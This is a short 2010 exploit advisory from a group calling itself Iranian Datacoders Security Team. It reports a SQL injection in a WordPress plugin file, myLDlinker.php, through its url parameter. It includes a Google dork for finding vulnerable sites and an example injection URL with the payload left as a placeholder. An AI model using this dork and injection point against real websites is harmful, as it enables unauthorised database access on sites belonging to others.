31 lines
No EOL
1.1 KiB
Text
31 lines
No EOL
1.1 KiB
Text
010101010101010101010101010101010101010101010101010101010
|
|
0 0
|
|
1 Iranian Datacoders Security Team 2010
|
|
0 0
|
|
010101010101010101010101010101010101010101010101010101010
|
|
|
|
|
|
# Exploit Title: Word Press SQL Injection ( in myLDlinker.php Plugin )
|
|
# Date: 23/07/2010
|
|
# Author: H-SK33PY
|
|
# Software Link: http://www.wordpress.com/
|
|
# Version: 2.9.2
|
|
# Google dork :inurl:"myLDlinker.php"
|
|
# Platform / Tested on: linux
|
|
# Category: Expliot code
|
|
# Code : [SQLi]
|
|
|
|
#BUG:#########################################################################
|
|
|
|
After find plugin at sites run SQL Inject :
|
|
|
|
|
|
example : http://site.com/myLDlinker.php?url=18[SQLi]
|
|
|
|
|
|
#############################################################################
|
|
Website : http://www.datacoders.ir
|
|
|
|
Special Thanks to : ccC0d3rZzz & AGT & all iranian datacoders members
|
|
|
|
############################################################################# |